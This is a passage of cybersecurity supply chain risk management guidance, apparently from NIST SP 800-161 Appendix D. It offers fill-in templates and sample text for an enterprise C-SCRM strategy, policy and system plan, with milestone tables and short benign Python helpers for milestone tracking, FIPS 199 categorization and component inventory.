Strategic objectives establish the foundation for determining enterprise-level C-SCRM controls
and requirements. Each objective supports achievement of the enterprise’s stated purpose in
pursuing sound C-SCRM practices and risk-reducing outcomes. Together, the objectives provide
the enterprise with the essential elements needed to bring C-SCRM capabilities to life, and
effectively pursue the enterprise’s purpose.
In aggregate, strategic objectives should address essential C-SCRM capabilities and enablers,
such as:
• Implementing a risk management hierarchy and risk management approach
• Establishing an enterprise governance structure that integrates C-SCRM requirements
and incorporates these requirements into enterprise policies
• Defining a supplier risk assessment approach
• Implementing a quality and reliability program that includes quality assurance and
quality control processes and practices
• Establishing explicit collaborative roles, structures, and processes for supply chain,
cybersecurity, product security, and physical security (and other relevant) functions
• Ensuring that adequate resources are dedicated and allocated to information security and
C-SCRM to ensure the proper implementation of policy, guidance, and controls
• Implementing a robust incident management program to successfully identify, respond to,
and mitigate security incidents
• Including critical suppliers in contingency planning, incident response, and disaster
recovery planning and testing
Sample Text
Objective 1: Effectively manage cybersecurity risks throughout the supply chain
This objective addresses the primary intent of the enterprise’s pursuit of C-SCRM.
Establishing and sustaining an enterprise-wide C-SCRM program will enable the
enterprise’s risk owners to identify, assess, and mitigate supply chain risk to the
enterprise’s assets, functions, and associated services. An initial capability that can be
sustained and grown in focus, breadth, and depth of function will be implemented in phases
and will incorporate holistic “people, process, and technology” needs to ensure that the
enterprise is able to achieve desired C-SCRM goals in areas such as improving enterprise
awareness, protection, and resilience.
Objective 2: Serve as a trusted source of supply for customers
Addressing customer supply chain risks at scale and across the enterprise’s diverse
portfolio demands a prioritization approach, structure, improved processes, and ongoing
governance. C-SCRM practices and controls need to be tailored to address the distinct
and varied supply chain threats and vulnerabilities that are applicable to the enterprise’s
customers. This objective can be achieved by:
• Strengthening vetting processes, C-SCRM requirements, and oversight of external
providers and
• Ensuring that customer needs are met in line with their cybersecurity risk appetite,
tolerance, and environment.
Objective 3: Position the enterprise as an industry leader in C-SCRM
The enterprise is well-positioned to enable and drive forward improvements that address
how cybersecurity risk is managed in supply chains across the industry. Therefore, the
enterprise must use this position to advocate for communication, incentivization, and the
education of industry players about the enterprise’s requirements and expectations related
to addressing supply chain risk.
1.1.4. Implementation Plan and Progress Tracking
Outline the methodology and milestones by which the progress of the enterprise’s C-SCRM
strategic objectives will be tracked. Though enterprise context heavily informs this process,
enterprises should define prioritized time horizons to encourage the execution of tasks that are
critical or foundational in nature. A common nomenclature for defining such time horizons is
“crawl, walk, run.” Regardless of the designated time horizon, the implementation of practical,
prioritized plans is essential to building momentum in establishing or enhancing C-SCRM
capabilities.
Once the implementation plan is baselined, an issue escalation process and feedback mechanism
are included to drive change to the implementation plan and progress tracking.
Sample Text
[The enterprise’s] execution of its C-SCRM strategic objectives and the sustained operational
effectiveness of underlying activities require a formal approach and commitment to progress
tracking. [The enterprise] will track and assess implementation of its strategic objectives by
defining subsidiary milestones and implementation dates in an implementation plan. Monitoring
and reporting on elements of the implementation plan require shared responsibilities across
multiple disciplines and a cross-enterprise, team-based approach.
The following implementation plan will be continuously maintained by mission and business
owners and reviewed by the senior leadership team as a part of regular oversight activities. Risks
and issues that impact the implementation plan should be proactively raised to the senior
leadership team by mission and business owners or their teams. The implementation plan may
then be revised at the senior leadership’s discretion.
Table D-1: Objective 1 – Implementation milestones to effectively manage cybersecurity
risks throughout the supply chain

Implementation Plan Milestone | Status | Owner | Priority | Target Date
Establish policy and authority | Planned | J. Doe | Do Now | XX/XX/XX
Establish and provide executive oversight and direction | Complete | … | Do Next | …
Integrate C-SCRM into the enterprise risk management (ERM) framework | Delayed | … | Do Later | …
Establish a C-SCRM PMO capability | Cancelled | … | … | …
Establish roles and responsibilities, and assign accountability | … | … | … | …
Develop C-SCRM plans | … | … | … | …
Establish the internal awareness function | … | … | … | …
Identify, prioritize, and implement supply chain risk assessment capabilities | … | … | … | …
Establish, document, and implement enterprise-level C-SCRM controls | … | … | … | …
Identify C-SCRM resource requirements, and secure sustained funding | … | … | … | …
Establish C-SCRM program performance monitoring | … | … | … | …
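Enterprises that automate progress tracking may find it useful to treat each milestone row as a
structured record. The sketch below is a minimal illustration, assuming a Python-based tracking
tool; the field names mirror Table D-1's columns, but this publication prescribes the columns,
not any particular implementation.

```python
# Illustrative record model for implementation-plan milestones. The fields
# mirror the columns of Table D-1; the dataclass and the filtering helper
# are assumptions for tooling purposes only.
from dataclasses import dataclass

@dataclass
class Milestone:
    name: str
    status: str       # Planned | Complete | Delayed | Cancelled
    owner: str
    priority: str     # Do Now | Do Next | Do Later
    target_date: str  # "XX/XX/XX" placeholder until scheduled

plan = [
    Milestone("Establish policy and authority", "Planned", "J. Doe",
              "Do Now", "XX/XX/XX"),
    Milestone("Integrate C-SCRM into the ERM framework", "Delayed",
              "TBD", "Do Later", "TBD"),
]

# Surface slipped milestones for senior-leadership review.
delayed = [m.name for m in plan if m.status == "Delayed"]
print(delayed)  # ['Integrate C-SCRM into the ERM framework']
```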
Table D-2: Objective 2 – Implementation milestones for serving as a trusted source of
supply for customers

Implementation Plan Milestone | Status | Owner | Priority | Target Date
Incorporate C-SCRM activities into customer-facing business lines, programs, and solution offerings | Planned | J. Doe | Do Now | XX/XX/XX
Ensure that customer support personnel are well-versed in management requirements and cybersecurity risks throughout the supply chain | Complete | … | Do Next | …
Establish minimum baseline levels of cybersecurity supply chain assurance | Delayed | … | Do Later | …
Establish processes to respond to identified risks and to monitor for impacts to the enterprise’s supply chain | Cancelled | … | … | …
Table D-3: Objective 3 – Implementation milestones to position the enterprise as an
industry leader in C-SCRM

Implementation Plan Milestone | Status | Owner | Priority | Target Date
Coordinate and engage with national security and law enforcement to ensure rapid access to mission-critical supply chain threats | Planned | J. Doe | Do Now | XX/XX/XX
Evaluate C-SCRM improvement opportunities, and strengthen requirements and oversight for industry-wide common solutions and shared services | Complete | … | Do Next | …
Advocate for C-SCRM awareness and competency through training and workforce development, to include secure coding training for developers | Delayed | … | Do Later | …
Release white papers and public guidance related to C-SCRM | Cancelled | … | … | …
1.1.5. Roles and Responsibilities
Designate those responsible for the Strategy and Implementation template, as well as its key
contributors. Include the role and name of each individual or group, as well as contact information
where necessary (e.g., enterprise affiliation, address, email address, and phone number).
Sample Text
• Senior leadership shall:
o Endorse the enterprise’s C-SCRM strategic objectives and implementation plan,
o Provide oversight of C-SCRM implementation and effectiveness,
o Communicate C-SCRM direction and decisions for priorities and resourcing
needs,
o Determine the enterprise’s risk appetite and risk tolerance, and
o Respond to high-risk C-SCRM issue escalations that could impact the enterprise’s
risk posture in a timely manner.
• Mission and business owners shall:
o Determine mission-level risk appetite and tolerance, ensuring that they are in line
with enterprise expectations;
o Define supply chain risk management requirements and the implementation of
controls that support enterprise objectives;
o Maintain criticality analyses of mission functions and assets; and
o Perform risk assessments for mission and business-related procurements.
1.1.6. Definitions
List the key definitions described within the Strategy and Implementation template, and provide
enterprise-specific context and examples where needed.
Sample Text
• Enterprise: An organization with a defined mission, goal, and boundary that uses
information systems to execute that mission and has the responsibility for managing its
own risks and performance. An enterprise may consist of all or some of the following
business aspects: acquisition, program management, financial management (e.g.,
budgets), human resources, security, and information systems, information, and mission
management.
• Objective: An enterprise’s broad expression of goals and a specified target outcome for
operations.
1.1.7. Revision and Maintenance
Define the required frequency of Strategy and Implementation template revisions. Maintain a
table of revisions to enforce version control. Strategy and Implementation templates are living
documents that must be updated and communicated to all appropriate individuals (e.g., staff,
contractors, and suppliers).
Sample Text
[The enterprise’s] Strategy and Implementation template must be reviewed every 3-5 years
(within the federal environment), at a minimum, since changes to laws, policies, standards,
guidelines, and controls are dynamic and evolving. Additional criteria that may trigger interim
revisions include:
• Change of policies that impact the Strategy and Implementation template,
• Significant Strategy and Implementation events,
• The introduction of new technologies,
• The discovery of new vulnerabilities,
• Operational or environmental changes,
• Shortcomings in the Strategy and Implementation template,
• Change of scope, and
• Other enterprise-specific criteria.
Table D-4: Version Management Table

Version Number | Date | Description of Change/Revision | Section/Pages Affected | Changes Made by (Name/Title/Enterprise)
2. C-SCRM POLICY
The C-SCRM policies direct the implementation of the C-SCRM strategy. The C-SCRM policies
can be developed at Level 1 and/or at Level 2 and are informed by mission- and business-
specific factors, including risk context, risk decisions, and risk activities from the C-SCRM
strategy. The C-SCRM policies support applicable enterprise policies (e.g., acquisition and
procurement, information security and privacy, logistics, quality, and supply chain). The C-
SCRM policies address the goals and objectives outlined in the enterprise’s C-SCRM strategy,
which in turn is informed by the enterprise’s strategic plan. The C-SCRM policies should also
address mission and business functions, as well as internal and external customer requirements.
C-SCRM policies also define the integration points for C-SCRM with the risk management
processes for the enterprise. Finally, the C-SCRM policies define, at a more specific and
granular level, the C-SCRM roles and responsibilities within the enterprise, any
interdependencies among those roles, and the interaction between the roles. The C-SCRM
policies at Level 1 are broader, whereas the C-SCRM policies at Level 2 are specific to the
mission and business function. C-SCRM roles specify the responsibilities for procurement,
conducting risk assessments, collecting supply chain threat intelligence, identifying and
implementing risk-based mitigations, monitoring, and other C-SCRM functions.
2.1. C-SCRM Policy Template
2.1.1. Authority and Compliance
List the laws, executive orders, directives, regulations, policies, standards, and guidelines that
govern the C-SCRM policy.
Sample Level 1 Text
• Policies
o [Enterprise Name] Enterprise Risk Management Policy
o [Enterprise Name] Information Security Policy
• Legislation
o Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure
Technology Act (SECURE Technology Act) of 2018
• Regulations
o NYDFS 23 NYCRR 500: Section 500.11 Third-Party Service Provider Security
Policy
o CIP-013-1: Cyber Security – Supply Chain Risk Management
o FFIEC Information Security Handbook II.C.20: Oversight of Third-Party Service
Providers
Sample Level 2 Text
• Policies
o [Enterprise Name] C-SCRM Policy
o [Mission and Business Process Name] Information Security Policy
• Regulations
o NYDFS 23 NYCRR 500: Section 500.11 Third-Party Service Provider Security
Policy
• Guidelines
o NIST 800-53, Revision 5: SR-1, PM-9, PM-30, PS-8, SI-12
o NIST 800-161, Revision 1: Appendix C
2.1.2. Description
Describe the purpose and scope of the C-SCRM policy, outline the enterprise leadership’s intent
to adhere to the plan, enforce its controls, and ensure that it remains current. Define the tier(s)
at which the policy applies. C-SCRM policies may need to be derived in whole or in part from
existing policies or other guidance.
For Level 2, C-SCRM policies should list all Level 1 policies and plans that inform the Level 2
policies, provide a brief explanation of what the mission and business encompass, and briefly
describe the scope of applicability (e.g., plans, systems, type of procurements, etc.) for the Level
2 C-SCRM policies.
Sample Level 1 Text
[The enterprise] is concerned about the risks in the products, services, and solutions bought,
used, and offered to customers.
The policy objective of the [the enterprise’s] C-SCRM Program is to successfully implement and
sustain the capability of providing improved assurance that the products, services, and solutions
used and offered by [the enterprise] are trustworthy, appropriately secure and resilient, and able
to perform to the required quality standard.
C-SCRM is a systematic process for identifying and assessing susceptibilities, vulnerabilities,
and threats throughout the supply chain and implementing strategies and mitigation controls to
reduce risk exposure and combat threats. The establishment and sustainment of an enterprise-
wide C-SCRM Program will enable [the enterprise’s] risk owners to identify, assess, and
mitigate supply chain risk to [the enterprise’s] mission assets, functions, and associated services.
Sample Level 2 Text
[The mission and business process] recognizes its criticality to [the enterprise’s objectives]. A
key component of producing products involves coordinating among multiple suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers. [The mission and business process] recognizes that the realization of
cybersecurity risks throughout the supply chain may disrupt or completely inhibit [the mission
and business process’s] ability to generate products in a timely manner and in accordance with
the required quality standard.
Based on the C-SCRM objectives set forth by [Enterprise Level 1 Policy], [the mission and
business process’s] policy objective is to implement C-SCRM capabilities that allow for the
assessment, response, and monitoring of cybersecurity risks throughout the supply chain. C-
SCRM capabilities that align with the policy and requirements set forth by the enterprise-wide C-
SCRM program will provide the boundaries within which [the mission and business process]
will tailor C-SCRM processes and practices to meet the unique requirements associated with
sourcing components and assembling key products.
2.1.3. Policy
Outline the mandatory high-level policy statements that underpin the goals and objectives of the
enterprise’s C-SCRM strategic plan, mission and business functions, and internal and external
customer requirements.
Sample Level 1 Text
[The enterprise’s] enterprise-level C-SCRM Program is established to implement and sustain the
capability to:
• Assess and provide appropriate risk response to cybersecurity risks that arise from the
acquisition and use of covered articles;
• Prioritize assessments of cybersecurity risks throughout the supply chain and risk
response actions based on criticality assessments of the mission, system, component,
service, or asset;
• Develop an overall C-SCRM strategy and high-level implementation plan, policies, and
processes;
• Integrate supply chain risk management practices throughout the acquisition and asset
management life cycle of covered articles;
• Share C-SCRM information in accordance with industry-wide criteria and guidelines; and
• Guide and oversee implementation progress and program effectiveness.
The C-SCRM Program shall:
• Be centrally led and coordinated by designated senior leadership who shall function as
[the enterprise’s] C-SCRM Program Executive and chair the C-SCRM Program
Management Office (PMO);
• Leverage and be appropriately integrated into [the enterprise’s] existing risk management
and decision-making governance processes and structures;
• Reflect a team-based approach and be collaborative, interdisciplinary, and intra-
enterprise in nature and composition;
• Incorporate a multilevel risk management approach that is consistent with the NIST Risk
Management Framework and NIST SP 800-161, Rev. 1; and
• Implement codified and regulatory C-SCRM requirements and industry-wide and
enterprise-specific policy direction, guidance, and processes.
Sample Level 2 Text
[The mission and business process’s] C-SCRM Program shall:
• Operate in accordance with the requirements and guidance set forth by [the enterprise’s]
C-SCRM Program;
• Collaborate with the C-SCRM Program Management Office (PMO) to apply the C-
SCRM practices and capabilities needed to assess, respond to, and monitor cybersecurity
risks arising from pursuit of [the mission and business process’s] core objectives;
• Integrate C-SCRM activities into applicable activities to support [the enterprise’s]
objective to manage cybersecurity risks throughout the supply chain;
• Assign and dedicate the resources needed for coordinating C-SCRM activities within [the
mission and business process];
• Identify [the mission and business process’s] critical suppliers, and assess the level of risk
exposure that arises from that relationship;
• Implement risk response efforts to reduce exposure to cybersecurity risks throughout the
supply chain; and
• Monitor [the mission and business process’s] ongoing cybersecurity risk exposure in the
supply chain profile, and provide periodic reporting to identified enterprise risk
management and C-SCRM stakeholders.
2.1.4. Roles and Responsibilities
State those responsible for the C-SCRM policies, as well as its key contributors. Include the role
and name of each individual or group, as well as contact information where necessary (e.g.,
enterprise affiliation, address, email address, and phone number).
Sample Level 1 Text
• The C-SCRM Program Executive shall be responsible for:
o Leading the establishment, development, and oversight of the C-SCRM Program
in coordination and consultation with designated C-SCRM Leads.
o Establishing and serving as the Chair of the C-SCRM PMO. This team will be
comprised of the chair and the designated C-SCRM Leads and will be responsible
for developing and coordinating C-SCRM strategy, implementation plans, and
actions that address C-SCRM-related issues; program reporting and oversight;
and identifying and making program resource recommendations.
o Escalating and/or reporting C-SCRM issues to Senior Officials, as may be
appropriate.
• Each C-SCRM Security Officer shall be responsible for:
o Identifying C-SCRM Leads (the Lead will be responsible for participating as a
collaborative and core member of the C-SCRM PMO);
o Incorporating relevant C-SCRM functions into enterprise and position-level
functions; and
o Implementing and conforming to C-SCRM Program requirements.
Sample Level 2 Text
• C-SCRM Leads shall be responsible for:
o Representing the interests and needs of C-SCRM PMO members.
o Leading and/or coordinating the development and execution of program or
business-line C-SCRM plans. This shall include ensuring that such plans are
appropriately aligned to and integrated with the enterprise-level C-SCRM plan.
• The mission and business process C-SCRM staff shall be responsible for:
o The primary execution of C-SCRM activities (e.g., supplier or product
assessments) and
o Support for mission- and business-specific C-SCRM activities driven by non-C-
SCRM staff.
2.1.5. Definitions
List the key definitions described within the policy, and provide enterprise-specific context and
examples where needed.
Sample Text (Applies to Level 1 and/or Level 2)
• Covered Articles: Information technology, including cloud computing services of all
types; telecommunications equipment or telecommunications services; the processing of
information on a federal or non-federal information system, subject to the requirements
of the Controlled Unclassified Information program; and all IoT/OT (e.g., hardware,
systems, devices, software, or services that include embedded or incidental information
technology).
• Cybersecurity Supply Chain Risk Assessment: A systematic examination of
cybersecurity risks throughout the supply chain, the likelihoods of their occurrence, and
potential impacts.
• Risk Owner: A person or entity with the accountability and authority to manage a risk.
2.1.6. Revision and Maintenance
Define the required frequency for revising and maintaining the C-SCRM policy. Maintain a table
of revisions to enforce version control. C-SCRM policies are living documents that must be
updated and communicated to all appropriate individuals (e.g., staff, contractors, and suppliers).
Sample Text (Applies to Level 1 and/or Level 2)
[The enterprise’s] C-SCRM policy must be reviewed on an annual basis, at minimum, since
changes to laws, policies, standards, guidelines, and controls are dynamic and evolving.
Additional criteria that may trigger interim revisions include:
• A change of policies that impact the C-SCRM policy,
• Significant C-SCRM events,
• The introduction of new technologies,
• The discovery of new vulnerabilities,
• Operational or environmental changes,
• Shortcomings in the C-SCRM policy,
• A change of scope, and
• Other enterprise-specific criteria.
Table D-5: Version Management Table

Version Number | Date | Description of Change/Revision | Section/Pages Affected | Changes Made by (Name/Title/Enterprise)
3. C-SCRM PLAN
The C-SCRM plan is developed at Level 3, is implementation-specific, and provides policy
implementation, requirements, constraints, and implications. It can either be stand-alone or a
component of a system security and privacy plan. If incorporated, the C-SCRM components
must be clearly discernible. The C-SCRM plan addresses the management, implementation, and
monitoring of C-SCRM controls and the development and sustainment of systems across the
SDLC to support mission and business functions. The C-SCRM plan applies to high- and
moderate-impact systems per [FIPS 199].
Given that supply chains can differ significantly across and within enterprises, C-SCRM plans
should be tailored to individual programs, enterprises, and operational contexts. Tailored C-
SCRM plans provide the basis for determining whether a technology, service, system
component, or system is fit for purpose, and as such, the controls need to be tailored accordingly.
Tailored C-SCRM plans help enterprises focus their resources on the most critical mission and
business functions based on mission and business requirements and their risk environment.
The following C-SCRM plan template is provided only as an example. Enterprises have the
flexibility to develop and implement various approaches for the development and presentation of
the C-SCRM plan. Enterprises can leverage automated tools to ensure that all relevant sections
of the C-SCRM plan are captured. Automated tools can help document C-SCRM plan
information, such as component inventories, individuals filling roles, security control
implementation information, system diagrams, supply chain component criticality, and
interdependencies.
3.1. C-SCRM Plan Template
3.1.1. System Name and Identifier
Designate a unique identifier and/or name for the system. Include any applicable historical
names and relevant Level 1 and Level 2 document titles.
Sample Text
This C-SCRM plan provides an overview of the security requirements for the [system name]
[unique identifier] and describes the supply chain cybersecurity controls in place or planned for
implementation to provide fit-for-purpose C-SCRM controls that are appropriate for the
information to be transmitted, processed, or stored by the system.
The security safeguards implemented for the [unique identifier] meet the requirements set forth
in the enterprise’s C-SCRM strategy and policy guidance.
3.1.2. System Description
Describe the function, purpose, and scope of the system, and include a description of the
information processed. Provide a general description of the system’s approach to managing
supply chain risks associated with the research and development, design, manufacturing,
acquisition, delivery, integration, operations and maintenance, and disposal of systems,
system components, or system services.
Ensure that the C-SCRM plan describes the system in the context of the enterprise’s supply chain
risk tolerance, acceptable supply chain risk mitigation strategies or controls, a process for
consistently evaluating and monitoring supply chain risk, approaches for implementing and
communicating the plan, and a description of and justification for supply chain risk mitigation
measures taken. Descriptions must be consistent with the high-level mission and business
functions of the system; the authorization boundary of the system; the overall system
architecture, including any supporting systems and relationships; how the system supports
enterprise missions; and the system environment (e.g., stand-alone, managed/enterprise,
custom/specialized, security-limited functionality, cloud) established in Level 1 and Level 2.
Sample Text
[The enterprise’s] document management system (DMS) serves to provide dynamic information
repositories, file hierarchies, and collaboration functionality to streamline internal team
communication and coordination. The data managed within the system contains personally
identifiable information (PII). The DMS is a commercial off-the-shelf (COTS) solution that was
purchased directly from a verified supplier, [supplier’s name], within the United States. It has
been functionally configured to meet the enterprise’s needs. No third-party code libraries are
utilized to deploy or maintain the system. It is hosted within the management layer of the
enterprise’s primary virtual private cloud provider.
The DMS is a Category 1 system that mandates a recovery time objective (RTO) of 1 hour in the
event of downtime. The enterprise maintains a disaster recovery environment with a second
private cloud provider to which the enterprise can switch if the Category 1 RTO is not likely to
be met on the primary platform.
3.1.3. System Information Type and Categorization
The following tables specify the information types that are processed, stored, or transmitted by
the system and/or its in-boundary supply chain. Enterprises utilize [NIST SP 800-60 v2], [NARA
CUI], or other enterprise-specific information types to identify information types and provisional
impact levels. Using guidance regarding the categorization of federal information and systems in
[FIPS 199], the enterprise determines the security impact levels for each information type.
Articulate the impact level (i.e., low, moderate, high) for each security objective (i.e.,
confidentiality, integrity, availability).
Sample Text
Table D-6: System Information Type and Categorization

Information Type | Confidentiality (Low, Moderate, High) | Integrity (Low, Moderate, High) | Availability (Low, Moderate, High)
Based on the table above, indicate the high-water mark for each of the security impacts (i.e., low,
moderate, high). Determine the overall system categorization.
Table D-7: Security Impact Categorization

Security Objective | Security Impact Level
Confidentiality | Low / Moderate / High
Integrity | Low / Moderate / High
Availability | Low / Moderate / High
Overall System Security Categorization | Low / Moderate / High
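The high-water mark determination is mechanical: per [FIPS 199], the overall categorization is
the maximum impact level assigned across the three security objectives. A minimal sketch of
that rule:

```python
# FIPS 199 high-water mark: the overall system categorization is the
# highest impact level assigned to any of the three security objectives.
ORDER = {"Low": 0, "Moderate": 1, "High": 2}

def overall_categorization(confidentiality: str, integrity: str,
                           availability: str) -> str:
    """Return the high-water mark across the C/I/A impact levels."""
    return max((confidentiality, integrity, availability),
               key=ORDER.__getitem__)

# Example: a system rated Moderate/Low/High is categorized High overall.
print(overall_categorization("Moderate", "Low", "High"))  # High
```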
3.1.4. System Operational Status
Indicate the operational status of the system. If more than one status is selected, list which part
of the system is covered under each status.
Sample Text
Table D-8: System Operational Status

System Status | Description
Operational | The system is currently operating and is in production.
Under Development | The system is being designed, developed, or implemented.
Major Modification | The system is undergoing a major change, development, or transition.
Disposition | The system is no longer operational.
3.1.5. System/Network Diagrams, Inventory, and Life Cycle Activities
Include a current and detailed system and network diagram with a system component inventory
or reference to where diagrams and inventory information can be found.
Contextualize the above components against the system’s SDLC to ensure that activities are
mapped and tracked. This guarantees full coverage of C-SCRM activities since these activities
may require repeating and reintegrating (using spiral or agile techniques) throughout the life
cycle. C-SCRM plan activities are required from concept all the way through development,
production, utilization, support, and retirement steps.
Sample Text
[System name] components may include (an illustrative machine-readable record follows the list):
• Component description
• Version number
• License number
• License holder
• License type (e.g., single user, public license, freeware)
• Barcode/property number
• Hostname (i.e., the name used to identify the component on a network)
• Component type (e.g., server, router, workstation, switch)
• Manufacturer
• Model
• Serial number
• Component revision number (e.g., firmware version)
• Physical location (include specific rack location for components in computer/server rooms)
• Vendor name(s)
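For enterprises that keep the component inventory in machine-readable form, each component
can be captured as one record with the fields above. The sketch below is illustrative only; the
schema and example values are assumptions, and any asset-management format the enterprise
already maintains will serve equally well.

```python
# Illustrative component-inventory record using the fields listed above.
# All names and values are placeholders for demonstration purposes.
component = {
    "description": "Document management application server",
    "version_number": "4.2.1",
    "license_number": "LIC-0000",            # placeholder
    "license_holder": "[Enterprise Name]",
    "license_type": "single user",
    "barcode_property_number": "PROP-0000",  # placeholder
    "hostname": "dms-app-01",
    "component_type": "server",
    "manufacturer": "[Manufacturer]",
    "model": "[Model]",
    "serial_number": "[Serial Number]",
    "firmware_version": "1.0.0",
    "physical_location": "Server room A, rack 12",
    "vendor_names": ["[Vendor Name]"],
}
```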
3.1.6. Information Exchange and System Connections
List any information exchange agreements (e.g., Interconnection Security Agreements [ISA],
Memoranda of Understanding [MOU], Memoranda of Agreement [MOA]) between the system
and another system, the date of the agreement, the security authorization status of the other
systems, the name of the authorizing official, a description of the connection, and diagrams that
show the flow of any information exchange.
Sample Text
Table D-9: Information Exchange and System Connections

Agreement Date | Name of System | Enterprise | Type of Connection or Information Exchange Method | FIPS 199 Categorization | Authorization Status | Authorization Official Name and Title
3.1.7. Security Control Details
Document C-SCRM controls to ensure that the plan addresses requirements for developing
trustworthy, secure, privacy-protective, and resilient system components and systems, including
the application of security design principles implemented as part of life cycle-based systems
security engineering processes. Consider relevant topic areas such as assessments, standard
operating procedures, responsibilities, software, hardware, products, services, and DevSecOps
considerations.
For each control, provide a thorough description of how the security controls in the applicable
baseline are implemented. Include any relevant artifacts for control implementation. Incorporate
any control-tailoring justification, as needed. Reference applicable Level 1 and/or Level 2 C-
SCRM policies that provide inherited controls where applicable. There may be multiple Level 1
policies that come from the CIO, CAO, or PMO.
Sample Text
SR‐6 SUPPLIER ASSESSMENTS AND REVIEWS
Implementation: As a part of a comprehensive, defense‐in‐breadth information security strategy,
the enterprise established a C-SCRM program to address the management of cybersecurity risks
throughout the supply chain. The C-SCRM PMO is responsible for conducting assessments of
cybersecurity risks that arise from business partners seeking to integrate with [system name] in
accordance with enterprise‐wide C-SCRM Level 2 policy requirements. C-SCRM training and
awareness materials must also be provided for all individuals prior to receiving access to [system
name].
Control Enhancements: Control enhancements 2, 7, and 8 from [NIST 800‐161] are applicable.
(2) SUPPLIER REVIEWS
Implementation: The C-SCRM PMO provides supplier reviews to business partners in the
form of SCRAs before entering into a contractual agreement to acquire information systems,
components, or services in relation to [system name]. The Level 1 strategy and Level 2
policy documents place SCRA requirements on business partners seeking to acquire IT
systems, components, and/or services. The SCRA provides a step‐by‐step guide for business
partners to follow in preparation for an assessment of suppliers by the C-SCRM PMO.
(7) ASSESSMENT PRIOR TO SELECTION/ACCEPTANCE/UPDATE
Implementation: The Level 2 policy defines what [system name] integration activities require
an SCRA. The process and requirements are defined in the SCRA Standard Operating
Procedure.
(8) USE OF ALL‐SOURCE INTELLIGENCE
Implementation: The C-SCRM PMO utilizes all‐source intelligence when conducting supply
chain risk assessments for [system name].
3.1.8. Role Identification
Identify key cybersecurity supply chain personnel or designated contacts (e.g., vendor contacts, acquisitions subject matter experts [SME], engineering leads, business partners, service providers), including each contact’s role, name, department/division, primary and alternative phone numbers, and email address.
Sample Text
Table D-10: Role Identification
| Role | Name | Department/Division | Primary Phone Number | Alternative Phone Number | Email Address |
|---|---|---|---|---|---|
| Vendor Contact | | | | | |
| Acquisitions SME | | | | | |
| Engineering Lead | | | | | |
| Business Partner | | | | | |
| Service Provider | | | | | |
3.1.9. Contingencies and Emergencies
In the event of contingency or emergency operations, enterprises may need to bypass normal C-SCRM acquisition processes to allow for mission continuity. However, contracting activities that are not vetted using approved C-SCRM plan processes introduce operational risks to the enterprise.
Where appropriate, describe abbreviated acquisition procedures to follow during contingencies
and emergencies, such as the contact information for C-SCRM, acquisitions, and legal subject
matter experts who can provide advice absent a formal tasking and approval chain of command.
Sample Text
In the event of an emergency where equipment is urgently needed, the C-SCRM PMO will offer
its assistance through C-SCRM subject matter experts (SMEs) to provide help in the absence of
formal tasking and chain of command approval. The CIO has the authority to provide such
waivers to bypass normal procedures. The current contact information for C-SCRM SMEs is
provided below:
• C-SCRM SME POC
Name
Email
Phone
• Acquisitions SME POC
Name
Email
Phone
• Legal SME POC
Name
Email
Phone
3.1.10. Related Laws, Regulations, and Policies
List any laws, executive orders, directives, policies, and regulations applicable to the
system (e.g., Executive Order 14028, FAR, FERC). For Level 3, include
applicable Level 1 C-SCRM Strategy and Implementation Plans and Level 2 C-SCRM Policy
titles.
Sample Text
The enterprise shall ensure that C-SCRM plan controls are consistent with applicable statutory
authority, including the Federal Information Security Modernization Act (FISMA); regulatory
requirements and external guidance, including Office of Management and Budget (OMB) policy
and Federal Information Processing Standards (FIPS) publications promulgated by the National
Institute of Standards and Technology (NIST); and internal C-SCRM policies and strategy
documents.
The following references apply:
• Committee on National Security Systems. CNSSD No. 505. (U) Supply Chain Risk
Management (SCRM)
• NIST SP 800‐53, Rev. 5, Security and Privacy Controls for Information Systems and
Organizations
• NIST SP 800‐161, Rev. 1, Cybersecurity Supply Chain Risk Management Practices for
Systems and Organizations
• OMB Circular A‐130 Managing Information as a Strategic Resource
• Federal Acquisition Supply Chain Security Act of 2018
• Executive Order 14028 of May 12, 2021, Improving the Nation’s Cybersecurity
3.1.11. Revision and Maintenance
Include a table that identifies the date of the change, a description of the modification, and the
name of the individual who made the change. At a minimum, review and update Level 3 C-SCRM
plans at life cycle milestones, gate reviews, and significant contracting activities, and verify them
for compliance with upper tier plans as appropriate. Ensure that the plan adapts to the shifting
impacts of exogenous factors, such as threats and changes to the enterprise or its environment.
Sample Text
Table D-11: Revision and Maintenance
| Version Number | Date | Description of Change/Revision | Section/Pages Affected | Changes Made by (Name/Title/Enterprise) |
|---|---|---|---|---|
| | | | | |
3.1.12. C-SCRM Plan Approval
Include a signature (either electronic or handwritten) and date when the system security plan is
reviewed and approved.
Sample Text
Authorizing Official:
X
Name
Date
3.1.13. Acronym List
Include and detail any acronyms utilized in the C-SCRM plan.
Sample Text
Table D-12: Acronym List
| Acronym | Detail |
|---|---|
| AO | Authorizing Official |
| C-SCRM | Cybersecurity Supply Chain Risk Management |
| SDLC | System Development Life Cycle |
3.1.14. Attachments
Attach any relevant artifacts that can be included to support the C-SCRM plan.
Sample Text
• Contractual agreements
• C-SCRM plans of contractors or suppliers
3.1.15. C-SCRM Plan and Life Cycles
C-SCRM plans should cover the full SDLC of systems and programs, including research and
development, design, manufacturing, acquisition, delivery, integration, operations, and
disposal/retirement. The C-SCRM plan activities should be integrated into the enterprise’s
system and software life cycle processes. Similar controls in the C-SCRM plan can be applied in
more than one life cycle process. The figure below shows how the C-SCRM plan activities can
be integrated into various example life cycles.
Fig. D-1: Example C-SCRM Plan Life Cycle
4. CYBERSECURITY SUPPLY CHAIN RISK ASSESSMENT TEMPLATE
The Cybersecurity Supply Chain Risk Assessment (C-SCRA)43 guides the review of any third-
party product, service, or supplier44 that could present a cybersecurity risk to a procurer. The
objective of the C-SCRA template is to provide a toolbox of questions that an acquirer can
choose to use or not use depending on the controls selected. Typically executed by C-SCRM
PMOs at the operational level (Level 3), the C-SCRA considers available public and private
information to perform a holistic assessment, including known cybersecurity risks throughout
the supply chain, the likelihoods of their occurrence, and their potential impacts on an enterprise
and its information and systems. As enterprises may be inundated with C-SCRAs and suppliers
inundated with C-SCRA requests, the enterprise should evaluate the relative priority of its
C-SCRAs as an influencing factor on the rigor of each assessment.
As with the other featured templates, the below C-SCRA is provided only as an example.
Enterprises must tailor the below content to align with their Level 1 and Level 2 risk postures.
The execution of C-SCRAs is perhaps the most visible and time-consuming component of
C-SCRM operations and must therefore be designed for efficient execution at scale with
dedicated support resources, templated workflows, and automation wherever possible.
